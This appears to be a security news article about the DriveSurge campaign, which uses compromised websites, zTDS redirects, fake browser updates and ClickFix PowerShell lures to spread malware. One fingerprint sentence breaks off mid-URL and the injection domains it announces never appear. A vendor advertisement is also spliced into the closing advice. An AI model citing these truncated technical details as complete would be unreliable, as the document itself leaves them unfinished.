Introduction to DriveSurge Malware Campaign
A threat actor tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates techniques on compromised sites. Thousands of websites have been compromised in DriveSurge campaigns to redirect visitors to malware-delivery infrastructure, according to researchers at cybersecurity company SilentPush.
ClickFix and FakeUpdates Techniques
ClickFix is a popular social engineering tactic that deceives victims into copying and executing malicious commands on their systems, often resulting in malware infections under the pretense of resolving a technical issue. In FakeUpdates attacks, threat actors entice victims with fraudulent software update prompts, usually impersonating browser updates, to trick them into downloading and installing malicious payloads.
DriveSurge Threat Actor
According to Silent Push researchers, the DriveSurge threat actor primarily functions as an initial access broker (IAB) operating on a pay-per-install (PPI) model, enabling follow-on attacks. Visitors of compromised websites are redirected through a Traffic Distribution System (TDS) known as zTDS, which profiles them and determines whether a FakeUpdates or a ClickFix lure is more appropriate.
zTDS is an open-source TDS that has existed since at least 2015 and that DriveSurge has been using since at least September 2025. Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites’ owners or their visitors, Silent Push says.
FakeUpdates Lures and ClickFix Attacks
The FakeUpdates lures contain bogus update notices for Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, and UC Browser, while the ClickFix attacks involve PowerShell commands. A case highlighted in the Silent Push report involves a fake Firefox update that downloaded a ZIP archive containing multiple DLLs and a malicious executable named ‘Browser Update.exe.’
A fake update for Firefox is a common tactic used by DriveSurge to trick victims into installing malware. The researchers identified eight technical fingerprints linked to the campaign that helped identify DriveSurge infrastructure and compromised websites.
Technical Fingerprints and Malicious Injection Domains
Among the technical fingerprints is a JavaScript injection following the ‘t.js?site=
Obfuscated JavaScript Payload and macOS Targeting
Additionally, the researchers discovered an obfuscated JavaScript payload specifically designed to target macOS desktop systems, delivered via verification-themed ClickFix attacks that hijack the clipboard, indicating that the campaign extends beyond Windows.
Recommendations for Users
Users are recommended to download browser updates only from their app’s settings menu (About > Check for Updates) and to avoid executing commands in the Windows command prompt or Terminal that they don’t fully understand.
- Download browser updates from the app’s settings menu
- Avoid executing unknown commands in the Windows command prompt or Terminal
Automated pentesting tools deliver real value, but they were built to answer one question: can an attacker move through the network? They were not built to test whether your controls block threats, your detection rules fire, or your cloud configs hold.
This guide covers the 6 surfaces you actually need to validate. Download Now and learn more about the DriveSurge malware campaign and how to protect yourself from similar threats.
- Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
- KongTuke hackers now use Microsoft Teams for corporate breaches
- FBI warns of in-person data theft attacks from extortion gang
- Hackers bypass SonicWall VPN MFA due to incomplete patching
- Microsoft Self-Service Password Reset abused in Azure data theft attacks
Source: BleepingComputer